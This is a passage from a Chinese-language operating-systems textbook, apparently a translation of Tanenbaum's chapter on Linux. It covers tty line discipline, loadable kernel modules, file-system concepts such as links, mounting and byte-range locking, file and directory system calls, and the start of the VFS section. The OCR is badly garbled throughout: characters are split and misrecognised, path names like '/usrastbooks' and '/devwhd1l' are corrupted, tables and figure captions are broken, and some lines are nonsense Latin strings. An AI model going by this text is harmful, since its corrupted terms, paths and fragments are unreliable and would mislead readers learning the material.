设备 联合 在 一 起 ， 通 过 tty_struct 结 构 来 表示 ， 一 般 作 为 和 终端 交换 的 数 
所 的 解释 器 。 例 如 ， 利 用 行规 则 可 以 完成 本 地 行 编辑 〈 即 探 除 的 字符 和 
行 可 以 被 删除 ) ， 回 车 可 以 映射 为 换行 ， 以 及 其 他 的 特殊 处 理 能 够 被 完 
成 。 然 而 ， 如 果 一 个 进程 要 跟 每 个 字符 交互 ， 那 么 它 可 以 把 行 设置 为 原 
始 模式 ， 此 时 行规 则 将 被 忽略 。 另 外 ， 并 不 是 所 有 的 设备 都 有 行规 则 。 








和 输出 采用 与 输入 类 似 的 工作 方式 ， 如 把 tab 扩 展 为 空格 ， 把 换行 转 
变 为 回 车 + 换行 ， 在 慢 的 机 械 式 终端 的 回 车 后 面 加 填充 字符 等 。 像 输入 
一 样 ， 输 出 可 以 通过 (加 工 模式 ) 行规 则 ， 或 者 忽略 (原始 模式 ) 行规 
则 。 原 始 模 式 对 于 GUI 和 通过 一 个 串 行 数 据 线 发 送 二 进 制 数 据 到 其 他 的 
计算 机 的 情况 尤其 有 用 ， 因 为 这 些 情况 都 不 需要 进行 转换 。 





10.5.5 Linux 中 的 模块 


几 十 年 来 ，UNIX 设 备 驱动 程序 是 被 静态 链接 到 内 核 中 的 。 因 此 ， 
只 要 系统 启动， 设备 驱动 程序 都 会 被 加 载 到 内 存 中 。 在 UNIX 比 较 成 熟 
的 环境 中 ， 如 大 部 分 的 部 门 小 型 计算 机 以 及 高 端的 工作 站 ， 其 共同 的 特 
点 是 IO 设备 集 孝 较 小 并 且 稳定 不 变 ， 这 种 模式 工作 得 很 好 。 基 本 上 ， 
一 个 计算 机 中 心 会 构造 一 个 包含 VO 设备 驱动 程序 的 内 核 ， 并 且 一 直 使 
用 它 。 如 来 第 二 年 ， 这 个 中 心 买 了 一 个 新 的 磁盘 ， 那 么 重新 链接 内 核 束 
可 以 了 。 一 点 问题 也 没有 。 





随 着 个 人 电脑 平台 Linux 系 统 的 到 来 ， 所 有 这 些 都 改变 了 。 相 对 于 
任何 一 台 小 型 机 上 的 VO 设备 ，PC 机 上 可 用 WO 设备 的 数量 都 有 了 数量 级 
上 的 增长 。 另 外 ， 虽 然 所 有 的 Linux 用 户 都 有 《或 者 很 容易 得 到 ) Linux 
源 代 码 ， 但 是 绝 大 部 分 用 户 都 没有 能 力 去 添加 一 个 新 的 驱动 程序 、 更 新 
所 有 的 设备 驱动 程序 数据 结构 、 重 链接 内 核 ， 然 后 把 它 作为 可 启动 的 系 
统 进行 安装 《更 不 用 提要 处 理 构 造 完 成 后 内 核 不 能 启动 的 问题 ) 。 








Linux 为 了 解决 这 个 问题 ， 引 入 了 可 加 载 模块 (loadable module) 的 
概念 。 可 加 载 模 块 是 在 系统 运行 时 可 以 加 载 到 内 核 的 代码 块 。 大 部 分 情 
况 下 ， 这 些 模块 是 字符 或 者 块 设备 驱动 ， 但 是 它们 也 可 以 是 完整 的 文件 
系统 、 网 络 协议 、 性 能 监控 工具 或 者 其 他 想 要 添加 的 模块 。 


当 一 个 模块 被 加 载 到 内 核 时 ， 会 发 生 下 面 几 件 事 。 第 一 ， 在 加 载 过 
程 中 ， 模 块 会 被 动态 地 重新 部 署 。 第 二 ， 系 统 会 检查 这 个 驱动 程序 需要 
的 资源 是 否 可 用 《〈 例 如， 中断 请 求 级 别 ) 。 如 果 有 效 ， 则 把 这 些 资 源 标 
记 为 正在 使 用 。 第 三 ， 设 置 所 有 需要 的 中 断 向 量 。 第 四 ， 更 新 驱动 转换 
表 使 其 能 够 处 理 新 的 主 设备 类 型 。 最 后 ， 运 行 驱动 程序 来 完成 可 能 需要 
的 特定 设备 的 初始 化 工作 。 一 旦 上 述 所 有 的 步骤 都 完成 了 ， 这 个 驱动 程 
序 就 安装 完成 了 ， 也 就 和 静态 安装 的 驱动 程序 一 样 了 。 其 他 现代 的 
UNIX 系 统 也 文 持 可 加 载 模块 。 




















10.6 Linux 文件 系统 


在 包括 Linux 在 内 的 所 有 操作 系统 中 ， 最 可 见 的 部 分 是 文件 系统 。 
在 本 节 的 以 下 部 分 ， 我们 将 介绍 隐藏 在 Linux 文 件 系 统 、 系 统 调用 以 及 
文件 系统 实现 背后 的 基本 思想 。 这 些 思想 中 有 一 些 来 源 于 MULTICS， 
虽然 有 很 多 已 经 被 MS-DOS、Windows 和 其 他 操作 系统 使 用 过 了 ， 但 是 
其 他 的 都 是 UNIX 类 操作 系统 特有 的 。Linux 的 设计 非常 有 意思 ， 因 为 它 
忠实 地 秉承 了 “小 的 就 是 美好 的 ”(Small is Beautiful) 的 设计 原则 。 虽 然 
只 是 使 用 了 最 简 的 机 制 和 少量 的 系统 调用 ， 但 是 Linux 却 提供 了 强大 的 
和 优美 的 文件 系统 。 


10.6.1 基本 概念 


最 初 的 Linux 文 件 系统 是 MINIX 1 文件 系统 。 但 由 于 它 只 能 文 持 14 字 
节 的 文件 名 (为 了 和 UNIX Version 7 兼容 ) 和 最 大 64MB 的 文件 〈 这 在 
只 有 10MB 硬 盘 的 年 代 是 足够 强大 的 ) ， 在 Linux 刚 被 开发 出 来 的 时 候 ， 
开发 者 就 意识 到 需要 开发 更 好 的 文件 系统 (开始 于 MINIX 1 发 布 的 5 年 
后 ) 。 对 MINIX 1 文件 系统 进行 第 一 次 改进 后 的 文件 系统 是 ext 文 件 系 
统 。ext 文 件 系 统 能 支持 255 个 字符 的 文件 名 和 2GB 的 文件 大 小 ， 但 是 它 
的 速度 比 MINIX 1 慢 ， 所 以 仍然 有 必要 对 它 进 行 改 进 。 最 终 ，ext2 文 件 
系统 被 开发 出 来 ， 它 能 够 支持 长 文件 名 和 大 文件 ， 并 且 具 有 更 好 的 性 











能 ， 这 使 得 它 成 为 了 Linux 主 要 的 文件 系统 。 不 过 ，Linux 使 用 虚拟 文件 
系统 VES) 层 文 持 很 多 类 型 的 文件 系统 (VEFS 将 在 下 文 介绍 ) 。 在 
Linux 链 接 时 ， 用 户 可 以 选择 要 构造 到 内 核 中 的 文件 系统 。 如 果 需 要 其 
他 文件 系统 ， 可 以 在 运行 时 作为 模块 动态 加 载 。 





Linux 中 的 文件 是 一 个 长 度 为 0 或 多 个 字 节 的 序列 ， 可 以 包含 任意 的 
信息 。ASCI 文 件 、 二 进 制 文件 和 其 他 类 型 的 文件 是 不 加 区 列 的 。 文 件 
中 各 个 位 的 含义 完全 由 文件 所 有 者 确定 ， 而 文件 系统 不 会 关心。 文件 名 
长 度 限 制 在 255 个 字符 内 ， 可 以 由 除了 NUL 以 外 的 所 有 ASCII 字 符 构 成 ， 
也 就 是 说 ， 一 个 包含 了 三 个 回 车 符 的 文件 名 也 是 合法 的 (但 是 这 样 命名 
很 不 方便 ) 。 


按照 惯例 ， 许 多 程序 能 识别 的 文件 包含 一 个 基本 文件 名 和 一 个 扩展 
名 ， 中 间 用 一 个 点 连接 (点 也 被 认为 是 占用 了 文件 名 的 一 个 字符 〉。 例 
如 一 个 名 为 prog.c 的 文件 是 一 个 典型 的 C 源 文件 ，prog.f90 是 一 个 典型 的 
FORTRAN 90 程 序 文件 ， 而 prog.o 通 常 是 一 个 object 文 件 〈 编 译 器 的 输出 
文件 ) 。 这 个 惯例 不 是 操作 系统 要 求 的 ， 但 是 一 些 编译 器 和 程序 希望 是 
这 样 ， 比 如 一 个 名 为 prog.java.gz 的 文件 可 能 是 一 个 gzip 压 缩 的 Java 程 
FF. 





为 了 方便 ， 文 件 可 以 被 组 织 在 一 个 目录 里 。 目 录 存 储 成 文件 的 形式 
并 且 在 很 大 程度 上 可 以 作为 文件 处 理 。 目 录 可 以 包含 子 目 录 ， 这 样 可 以 
形成 有 层次 的 文件 系统 。 根 目录 表示 为 “”*， 它 通常 包含 了 多 个 子 目 录 。 








字符 “/”* 还 用 于 分 离 目 录 名 ， 所 以 /usr/ast/x 实 际 上 是 说 文件 x 位 于 目录 ast 
中 ， 而 目录 ast 位 于 /usr 目 录 中 。 图 10-23 列 举 了 根 目 录 下 几 个 主要 的 目录 





二 进 制 〈 可 执行 ) 文件 
IO 设备 文件 


本 


usr JE 


图 10-23 大 部 分 Linux 系 统 中 一 些 重要 的 目录 





在 Linux 中 ， 不 管 是 对 shell 还 是 一 个 打开 文件 的 程序 来 说 ， 都 有 两 
种 方法 表示 一 个 文件 的 文件 名 。 第 一 种 方法 是 使 用 绝对 路 径 ， 绝 对 路 径 
告诉 系统 如 何 从 根 目 录 开 始 碍 找 一 个 文件 。 例 
如 /usrastbooks/mos3/chap-10， 这 个 路 径 名 告诉 系统 在 根 目 录 里 寻找 一 
个 叫 usr 的 目录 ， 然 后 再 从 usr 中 寻找 ast 目 录 .…… 依 照 这 种 方式 ， 最 终 找 
到 chap-10 文 件 。 








绝对 路 径 的 缺点 是 文件 名 太 长 并 且 不 方便 。 因 为 这 个 原因 ，Linux 
允许 用 户 和 进程 把 他 们 当前 工作 的 目录 标识 为 工作 目录 ， 这 样 路 径 名 就 
可 以 相对 于 工作 目录 命名 ， 这 种 方式 命名 的 目录 名 叫做 相对 路 径 。 例 








如 ， 如 果 /usrvastbooks/mos3 是 工作 目录 ， 那 么 Shell 命 令 


cp chap-10 backup-10 


MKS cp/usr/ast/books/mos3/chap-10/usr/ast/books/mos3/backup-10 
的 效果 是 一 样 的 。 


一 个 用 户 要 使 用 属于 为 一 个 用 户 的 文件 或 者 使 用 文件 树 结构 里 的 茶 
个 文件 的 情况 是 经 常 发 生 的 。 例 如 ， 两 个 用 户 共 享 一 个 文件 ， 这 个 文件 
位 于 其 中 录 个 用 户 所 拥有 的 目录 中 ， 男 一 个 用 户 需 要 使 用 这 个 文件 时 ， 
必须 通过 绝对 路 径 才 能 引用 它 (或 者 通过 改变 工作 目录 的 方式 ) 。 如 果 
绝对 路 径 名 很 长 ， 那 么 每 次 输入 时 将 会 很 暴 烦 。 为 了 解决 这 个 问题 ， 
Linux 提 供 了 一 种 指 回 已 存在 文件 的 目录 项 ， 称 作 链 接 〈link) 。 








以 图 10-24a 为 例 ， 两 个 用 户 Fred 和 Lisa 一 起 工作 来 完成 一 个 项 目 ， 
他 们 需要 访问 对 方 的 文件 。 如 果 Fred 的 工作 目录 是 /usrfred， 他 可 以 使 
用 /usr/lisa/x 来 访问 Lisa 目 录 下 的 文件 x。Fred 也 可 以 如 图 10-24b 所 示 的 方 
法 ， 在 自己 目录 下 创建 一 个 链接 ， 然 后 他 就 可 以 用 x 来 代替 /usvlisa/x 
Ts 











fred 





a X 

b y y 

C Z 
a) b) 


图 10-24 atit, D) 链 接 后 


在 上 面 的 例子 中 ， 我 们 说 在 创建 链接 之 前 ，Fred 引 用 Lisa 的 文件 x 的 
惟一 方法 是 使 用 绝对 路 径 。 实 际 上 这 并 不 正确 ， 当 一 个 目录 被 创建 出 来 
时 ， 有 两 个 目录 项 “.*” 和 “..” 被 自动 创建 出 来 存放 在 该 目录 中 ， 前 者 代表 
工作 目录 自身 ， 而 后 者 表示 该 目录 的 父 目录 ， 也 就 是 该 目录 所 在 的 目 
录 。 这 样 一 来 ， 在 /usr/fred 目 录 中 访问 Lisa 的 文件 x 的 男 一 个 路 径 





是 : ../lisa/x。 


除了 普通 的 文件 之 外 ，Linux 还 支持 字符 特殊 文件 和 块 特殊 文件 。 
字符 特殊 文件 用 来 建 模 串 行 WO 设 备 ， 比 如 键盘 和 打印 机 。 如 果 打 开 并 
从 /dec/tty 中 读 取 内 容 ， 等 于 从 键盘 读 取 内 容 ， 而 如 果 打 开 并 向 /dev/lp 中 


写 内 容 ， 等 于 癌 打 印 机 输出 内 容 。 块 特殊 文件 通常 有 类 似 于 /devwhd1l 的 
文件 名 ， 它 用 来 直接 向 硬盘 分 区 中 读 取 和 写 入 内 容 ， 而 不 需要 考虑 文件 
系统 。 一 个 偏 移 为 k 字 节 的 read 操 作 ， 将 会 从 相应 分 区 开始 的 第 k 个 字 市 
开始 读 取 ， 而 完全 忽略 i 节点 和 文件 的 结构 。 原 始 块 设备 常 被 一 些 建 并 
《如 mkfs) 或 修补 “如 fsck) 文件 系 统 的 程序 用 来 进行 分 页 和 交换 。 








许多 计算 机 有 两 块 或 更 多 的 磁盘 。 银 行使 用 的 大 型 机 ， 为 了 存储 大 
量 的 数据 ， 通 常 需要 在 一 台 机 器 上 安装 100 个 或 更 多 的 磁盘 。 甚 至 在 PC 
上 也 至 少 有 两 块 磁盘 一 一 一 块 硬盘 和 一 个 光盘 驱动 器 (如 DVD)〉。 当 一 
台 机 器 上 安装 了 多 个 磁盘 的 时 候 ， 如 何 处 理 它 们 就 是 一 个 问题 。 








一 个 解决 方法 是 在 每 一 个 磁盘 上 安装 目 包 含 的 文件 系统 ， 使 它们 之 
间 互 相 独 立 。 考 虑 如 图 10-25a 所 示 的 解决 方法 ， 有 一 个 便 盘 C: 和 一 个 
DVD D:， 它 们 都 有 自己 的 根 目录 和 文件 。 如 果 使 用 这 种 解决 方法 ， 除 
了 默认 盘 外 ， 使 用 者 必须 指定 设备 和 文件 ， 例 如 ， 要 把 文件 x 复制 到 目 
录 d 中 《假设 C: 是 默认 盘 ) ， 应 该 使 用 命令 





cp D:/x/a/d/x 


这 种 方法 被 许多 操作 系统 使 用 ， 包 括 MS-DOS、Windows 98 和 
VMS. 


WE tik 





a) b) 
图 10-25 ”分离 的 文件 系统 ; D) 挂 载 之 后 


Linux 的 解决 方法 是 允许 一 个 磁盘 挂 载 到 另 一 个 磁盘 的 目录 树 上 ， 
比如 ， 我 们 可 以 把 DVD 挂 载 在 目录 /b 上 ， 构 成 如 图 10-25b 所 示 的 文件 系 
统 。 挂 载 之 后 ， 用 户 能 够 看 见 一 个 目录 树 ， 而 不 再 需要 关心 文件 在 哪个 
设备 上 ， 上 面 提 到 的 命令 就 可 以 变 成 


cp/b/x/a/d/x 





和 所 有 文件 都 在 硬盘 上 是 一 样 的 。 


Linux 文 件 系统 的 另 一 个 有 趣 的 性 质 是 加 锁 locking) 。 在 一 些 应 
用 中 会 出 现 两 个 或 更 多 的 进程 同时 使 用 同一 个 文件 的 情况 ， 可 能 导致 苋 


争 条 件 (race condition) 。 有 一 种 解雇 方法 是 使 用 临界 区 ， 但 是 如 果 这 
些 进 程 属于 相互 不 认识 的 独立 的 用 户 ， 这 种 解决 方法 是 不 方便 的 。 





考虑 这 样 的 一 个 例子 ， 一 个 数据 库 组 织 许多 文件 在 一 个 或 多 个 目录 
中 ， 它 们 可 以 被 不 相关 的 用 户 访 问 。 可 以 通过 设置 信号 量 来 解决 互 斥 的 
问题 ， 在 每 个 目录 或 文件 上 设置 一 个 信号 量 ， 当 程序 需要 访问 相应 的 数 
据 时 ， 在 相应 的 信号 量 上 做 一 个 down 操 作 。 但 这 样 做 的 缺点 是 ， 尽 管 
进程 只 需要 访问 一 条 记录 却 使 得 整个 目录 或 文件 都 不 能 访问 。 

















由 于 这 种 原因 ，POSIX 提 供 了 一 种 灵活 的 、 细 粒度 的 机 制 ， 允 许 一 
个 进程 使 用 一 个 不 可 分 割 的 操作 对 小 到 一 个 字 节 、 大 到 整个 文件 加 锁 。 
加 锁 机 制 要 求 加 锁 者 标识 要 加 锁 的 文件 、 开 始 位 置 以 及 要 加 锁 的 字 市 
数 。 如 末 操 作成 功 ， 系 统 会 在 表格 中 添加 记录 说 明 要 求 加 锁 的 字 市 (如 
数据 库 的 一 条 记录 ) 已 被 锁 住 。 


系统 提供 了 两 种 锁 ， 共 孕 锁 和 互 斥 锁 。 如 宁 文 件 的 一 部 分 已 经 被 加 
TREM, AA EMSS BE TN, (Ee Bs Bile Kee ak 
功 的 ;如果 文 件 的 一 部 分 已 经 和 被 加 了 互 斥 锁 ， 那 么 在 互 斥 锁 解 除 之 前 加 
任何 锁 都 不 会 成 功 。 为 了 成 功 地 加 锁 ， 请 求 加 锁 的 部 分 的 所 有 字 节 都 必 
须 是 可 用 的 。 


在 加 锁 时 ， 进 程 必 须 指出 当 加 锁 不 成 功 时 是 否 阻 蛤 。 如 果 选 择 阻 
答 ， 则 当 已 经 存在 的 锁 被 删除 时 ， 进 程 被 放行 并 在 文件 上 加 锁 ;， 如 果 选 





择 不 阻塞 ， 系 统 调用 在 加 锁 失 败 时 立即 返回 ， 并 设置 状态 码 表 明 加 锁 是 
否 成 功 ， 如 果 不 成 功 ， 由 调用 者 决定 下 一 步 动 作 《〈“ 比 如 ， 等 竺 或 者 继续 


Zin) 。 








加 锁 区 域 可 以 是 重合 的 。 如 图 10-26a 所 示 ， 进 程 A 在 第 4 字 节 到 第 7 
字 节 的 区 域 加 了 共享 锁 ， 之 后 ， 进 程 B 在 第 6 字 节 到 第 9 字 市 加 了 共 宇 
锁 ， 如 图 10-26b 所 示 ， 最 后 ， 进 程 C 在 第 2 字 节 到 第 11 字 节 加 了 共享 锁 。 
由 于 这 些 锁 都 是 共 孚 锁 ， 是 可 以 同时 存在 的 。 














进程 A 的 共享 锁 





图 10-26 人 四 加 了 一 个 锁 的 文件 ; dD) HAT BIDE; 增加 了 第 三 个 


此 时 ， 如 果 一 个 进程 试图 在 图 10-26c 中 文件 的 第 9 个 字 节 加 互 斥 





锁 ， 并 设置 加 锁 失 败 时 阻 暑 ,那么 会 发 生 什么 ?由 于 该 区 域 已 经 被 进程 
B 和 进程 C 两 个 进程 加 锁 ， 这 个 进程 将 会 被 阻 瞪 ， 直 到 进程 B 和 进程 C 释 
放 它 们 的 锁 为 止 。 


10.6.2 ”Linux 的 文件 系统 调用 





许多 系统 调用 与 文件 和 文件 系统 有 关 。 在 本 节 中 ， 首 先 研究 对 单个 
文件 进行 操作 的 系统 调用 ， 之 后 我 们 会 研究 针对 目录 和 文件 系统 的 系统 
调用 。 要 创建 一 个 文件 时 ， 可 以 使 用 creat 系 统 调 用 。【〈 曾 经 有 人 问 Ken 
Thompson， 如 条 给 他 一 次 重新 发 明 UNIX 的 机 会 ， 他 会 做 什么 不 同事 
情 ， 他 回答 说 他 要 把 这 个 系统 调用 的 拼写 改 成 create， 而 不 是 现在 的 
creat。) 这 个 系统 调用 的 参数 是 文件 名 和 保护 模式 。 于 是 





fd=creat ("abc",mode) ; 


创建 了 一 个 名 为 abc 的 文件 ， 并 根据 mode 设 置 文件 的 保护 位 。 这 些 
保护 位 决定 了 用 户 访问 文件 的 权限 及 方式 。 在 下 文 将 会 具体 讨论 。 


creat 系 统 调用 不 仪 创建 了 一 个 新 文件 ， 还 以 写 的 方式 打开 了 这 个 文 
件 。 为 了 使 以 后 的 系统 调用 能 够 访问 这 个 文件 ，creat 成 功 时 返回 一 个 非 
负 整 数 ， 这 个 非 负 整数 叫做 文件 摘 述 符 ， 也 就 是 例子 中 的 fd。 如 果 creat 
作用 在 一 个 已 经 存在 的 文件 上 ， 那 么 该 文件 的 文件 长 度 会 被 截 短 为 0， 
它 的 内 容 会 被 丢弃。 通过 设置 合适 的 参数 ，open 系 统 调用 也 能 创建 文 
jaa 





现在 我 们 继续 讨论 图 10-27 列 出 的 主要 的 文件 系统 调用 。 为 了 读 或 





写 一 个 已 经 存在 的 文件 ， 必 须 使 用 open 系 统 调用 打开 这 个 文件 。 它 的 参 
数 是 要 打开 文件 的 文件 名 以 及 打开 方式 : 只 读 、 只 写 或 两 者 。 此 外 ， 也 
可 以 指定 不 同 的 选项 。 和 creat 一 样 ，open 返 回 一 个 文件 描述 符 ， 可 用 来 
进行 读 写 。 然 后 可 以 使 用 close 系 统 调用 来 关闭 文件 ， 它 使 得 文件 描述 符 
可 以 被 后 来 的 creat 或 open 使 用 。creat 和 open 系 统 调用 总 是 返回 未 被 使 用 
的 最 小 数值 的 文件 描述 符 





系统 调用 oO M R 
fd = creat(name, mode) 创建 新 文件 的 一 种 方法 
fd = open(file, how, .) 打开 文件 读 、 写 或 者 读 写 
s= close(fd) 关闭 i = A 
n = read(fd, buffer, nbytes) 从 文件 中 读 取 数据 到 一 个 缓冲 区 
n = write(fd, buffer, ı nbytes) 把 数据 从 缓冲 区 写 到 文件 | 
position = lseek(fd, offset, whence)| 移动 文件 指针 
s = stat(name, &buf) 获取 一 个 文件 的 状态 信息 _ 



















































































s = fstat(fd, &buf) 获取 一 个 文件 的 状态 信息 
s = pipe(&fd[0]) 创建 一 个 管道 — 
|s = fentl(fd, cmd,*… 文件 加 锁 及 其 他 操作 





图 10-27 中文 件 相关 的 一 些 系统 调用 。 如 果 发 生 错 误 ， 那 么 返回 值 S 
是 -1; fd 是 一 个 文件 描述 符 ，position 是 文件 偏 移 。 参 数 的 含义 是 很 清楚 


的 

当 一 个 程序 以 标准 方式 运行 时 ， 文 件 描述 符 0、1、2 已 经 分 别 用 于 
标准 输入 、 标 准 输出 和 标准 错误 。 通 过 这 种 方式 ， 一 个 过 滤器 ， 比 如 
Sort 程序， 可 以 从 文件 描述 符 0 读 取 输 入 ， 输 出 到 文件 描述 符 1， 而 不 需 








要 关心 这 些 文件 是 什么 。 这 种 机 制 能 够 有 效 是 因为 shell 在 程序 局 动 之 前 
就 设置 好 了 它们 的 值 。 





室 无 疑问 ， 最 常 使 用 的 文件 系统 调用 是 read 和 write。 它 们 每 个 都 有 
三 个 参数 : 文件 描述 符 《〈 标 明 要 读 写 的 文件 ) 、 绥 冲 区 地 址 《给 出 数据 
存放 的 位 置 或 者 读 取 数 据 的 位 置 ) ， 长 度 〈 给 出 要 传输 的 数据 的 字 节 
BO 。 这 些 就 是 全 部 了 。 这 种 设计 非常 简单 ， 一 个 典型 的 调用 方法 是 : 




















n=read(fd,buffer,nbytes) ; 














虽然 几乎 所 有 程序 都 是 顺序 读 写 文件 的 ， 但 是 一 些 程序 需要 能 够 从 
文件 的 任何 位 置 随机 地 读 写 文件 。 每 个 文件 都 有 一 个 指针 指向 文件 当前 
的 读 写 位 置 。 当 顺序 地 读 写 文件 时 ， 这 个 指针 指 回 将 要 读 写 的 字 节 。 如 
果 文 件 位 置 指针 最 初 指向 4096， 在 读 取 了 1024 个 字 节 后 ， 它 会 自动 地 指 
回 第 5120 个 字 市 。lseek 系 统 调用 可 以 改变 位 置 指针 的 值 ， 所 以 之 后 的 
read 和 write 可 以 从 文件 的 任何 位 置 开 始 读 写 ， 甚 至 是 超出 文件 的 结尾 。 
这 个 系统 调用 叫做 lseek， 是 为 了 避免 与 eek 冲突 ， 其 中 后 者 以 前 在 16 位 
计算 机 上 用 于 查找 ， 现 在 已 经 不 使 用 了 。 








lseek 有 三 个 参数 : 第 一 个 是 文件 描述 符 ， 第 二 个 是 文件 读 写 位 置 ， 
第 三 个 表明 读 写 位 置 是 相对 于 文件 开头 、 当 前 位 置 还 是 文件 尾 。lseek 的 
返回 值 是 当 读 写 位 置 改变 后 的 绝对 位 置 。 有 点 讽刺 的 是 ，lseek 古 惟一 一 
个 从 不 会 引起 实际 的 磁盘 寻 道 的 文件 系统 调用 ， 因 为 它 所 做 的 只 是 修改 








了 内 存 中 的 一 个 值 〈 文 件 读 写 位 置 ) 。 





对 于 每 个 文件 ，Linux 记 录 了 它 的 文件 类 型 〈 普 通 文 件 、 目 录 、 特 
殊 文 件 ) 、 大 小 、 最 后 一 次 修改 时 间 和 其 他 信息 。 程 序 可 以 使 用 stat 系 
统 调 用 来 得 看 这 些 信息 ，stat 的 第 一 个 参数 是 文件 名 ， 第 二 个 参数 是 指 
加 获取 的 文件 信息 将 要 存放 的 结构 的 指针 ， 该 结构 的 各 个 域 如 图 10-28 
所 示 。 系 统 调用 fstat 的 作用 和 stat 一 样 ， 惟 一 不 同 的 是 ，fstat 针 对 一 个 打 
开 的 文件 《文件 名 可 能 未 知 ) 进行 操作 ， 而 不 是 一 个 路 径 名 。 





存储 文件 的 设备 

i 节点 号 (哪个 文件 在 设备 上 》 
文件 模式 〈 包 括 保护 信息 ) 
指向 文件 的 连接 数 
文件 所 有 者 的 标识 








文件 所 属 的 组 
文件 大 小 (单位 是 字 节 ) 
创建 时 间 


最 近 访 问 的 时 间 
最 近 修 改 的 时 间 


图 10-28 stat 系统 调用 返回 的 域 


pipe 系 统 调用 用 来 创建 一 个 shell 管 线 。 它 创建 了 一 种 伪 文 件 
(pseudo-file》， 用 于 缓冲 管线 通信 的 数据 ， 并 给 绥 冲 区 的 读 写 都 返回 


文件 措 述 待 。 以 下 面 的 管线 为 例 : 


sort<in|head-30 


在 执行 sort 的 进程 中 ， 文 件 描 述 符 1《〈 标 准 输出 ) 被 设置 为 写 入 管 
道 ， 执 行 head 的 进程 中 ， 文 件 描述 符 0《〈“ 标 准 输入 ) 被 设置 为 从 管道 读 
取 。 通 过 这 种 方式 ，sort 只 是 从 文件 描述 符 0《〈 被 设置 为 文件 mp) 该 取 ， 
写 入 到 文件 描述 符 1〈 管 道 ) ， 甚 至 不 会 觉察 到 它们 已 经 被 重 定 癌 了 。 
如 末 它 们 没有 舟 重 定 癌 ，sort 将 会 自动 从 键盘 读 取 数据 ， 而 后 输出 到 显 
示 器 〈 默 认 设备 ) 。 同 样 地 ， 当 head 从 文件 描述 符 0 中 读 取 数 据 时 ， 它 
读 取 到 的 是 sort 写 入 到 管道 缓冲 区 中 的 数据 ，head 甚 至 不 知道 目 己 使 用 
了 管道 。 这 个 例子 清晰 地 表明 了 一 个 简单 的 概念 〈 重 定向 ) 和 一 个 简单 
的 实现 《文件 描述 符 0 和 1) 如 何 实现 一 个 强大 的 工具 《以 任意 方式 连接 
程序 ， 而 不 需要 去 修改 它们 ) 。 











图 10-27 列 举 的 最 后 一 个 系统 调用 是 fcnt。fcnt 用 于 加 锁 和 解锁 文 
件 ， 应 用 共享 锁 和 互 斥 锁 ， 或 者 是 执行 一 些 文件 相关 的 其 他 操作 。 





现在 我 们 开始 关注 与 目录 及 文件 系统 整体 更 加 相关 ， 而 不 是 仪 和 单 
个 文件 有 关 的 系统 调用 ， 图 10-29 列 举 了 一 些 这 样 的 系统 调用 。 可 以 使 
用 mkdir 和 rmdir 创 建 和 删除 目录 ， 但 需要 注意 : 只 有 目录 为 空 时 才 可 以 


将 其 删除 。 



















































































系统 调用 fii ” 述 
s=mkdir (path, mode) 建立 新 目录 
s=rmdir (path) 删除 目录 
s=link (oldpath, newpath) | 创建 指向 已 有 文件 的 链接 
s=unlink (path) 取消 文件 的 链接 
s=chdir (path) 改变 工作 目录 
dir=opendir (path) 打开 目录 
s=closedir (dir) 关闭 目录 
dirent=readdir (dir) 读 取 一 个 目录 项 












| 


_rewinddir (dir) 


回转 目录 使 其 再 次 被 读 取 








图 10-29 与 目录 相关 的 一 些 系 统 调 用 。 如 果 发 生 错 误 ， 那 么 返回 值 s 
是 -1， dir 是 一 个 目 录 流 ， dirent 一 个 目 Kio 参数 的 含义 是 自 解 释 的 


如 图 10-24 所 示 ， 创 建 一 个 指向 已 有 文件 的 链接 时 创建 了 一 个 目录 
Mi (directory entry) 。 系 统 调用 link 用 于 创建 链接 ， 它 的 参数 是 已 有 文 
件 的 文件 名 和 链接 的 名 称 ， 使 用 unlink 可 以 删除 目录 项 。 当 文件 的 最 后 
一 个 链接 被 删除 时 ， 这 个 文件 会 税目 动 删 除 。 对 于 一 个 没有 被 链接 的 文 
件 ， 对 其 使 用 unlink 也 会 让 它 从 目录 中 消失 。 





使 用 chdir 系 统 调用 可 以 改变 工作 目录 ， 工 作 目 录 的 改变 会 影响 到 相 
对 路 径 名 的 解释 。 





10.6.3 Linux 文件 系统 的 实现 


在 本 市 中 ， 我 们 首先 研 究 虚 拟 文件 系统 (Virtual File System, 
VFS) 层 文 持 的 抽象 。VFS 对 高 层 进程 和 应 用 程序 隐藏 了 Linux 文 持 的 所 
有 文件 系统 之 间 的 区 别 ， 以 及 文件 系统 是 存储 在 本 地 设备 ， 还 是 需要 通 
过 网 络 访问 的 远程 设备 。 设 备 和 其 他 特殊 文件 也 可 以 通过 VFS 访 问 。 接 
下 来 ， 我 们 将 描述 第 一 个 被 Linux 广 泛 使 用 的 文件 系统 ext2 (second 
extended file system) 。 随 后 ， 我 们 将 讨论 ext3 文 件 系 统 中 所 作 的 改进 。 
所 有 的 Linux 都 能 处 理 有 多 个 磁盘 分 区 且 每 个 分 区 上 有 一 个 不 同文 件 系 
统 的 情况 。 


1.Linux 虚 拟 文 件 系统 


为 了 使 应 用 程序 能 够 与 在 本 地 或 远程 设备 上 的 不 同文 件 系统 进行 交 
互 ，Linux 采 用 了 一 个 被 其 他 UNIX 系 统 使 用 的 方法 : 虚拟 文件 系统 。 
VFS 定 义 了 一 个 基本 的 文件 系统 抽象 以 及 这 些 抽象 上 允许 的 操作 集合 。 
调用 上 节 中 提 到 的 系统 调用 访问 VFS 的 数据 结构 ， 确 定 要 访问 的 文件 所 
属 的 文件 系统 ， 然 后 通过 存储 在 VFS 数 据 结构 中 的 函数 指针 调用 该 文件 
系统 的 相应 操作 。 


图 10-30 总 结 了 VFS 文 持 的 四 个 主要 的 文件 系统 结构 。 其 中 ， 超 级 块 
包含 了 文件 系统 布局 的 重要 信息 ， 破 坏 了 超级 块 将 会 导致 文件 系统 无 法 





访问 。 每 个 i 节 点 (i-node,index-node 的 简写 ， 但 是 从 来 不 这 样 称呼 它 ， 
而 一 些 人 省 略 了 “-” 并 称 之 为 i 节 点 ) 表示 某 个 确切 的 文件 。 值 得 注意 的 
是 在 Linux 中 ， 目 录 和 设备 也 当 作 是 文件 ， 所 以 它们 也 有 自己 对 应 的 i 节 
点 。 超 级 块 和 i 节点 都 有 相应 的 结构 ， 由 文件 系统 所 在 的 物理 磁盘 维 
护 。 


Superblock | 特定 的 文件 系统 read_inode,sync_fs 

















特定 的 文件 d_compare,d_delete 
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图 10-30 VEFS 支 持 的 文件 系统 抽象 


为 了 便于 目录 操作 及 路 径 〈 比 如 /usr/ast/bin〉 的 遍历 ，VFS 支 持 
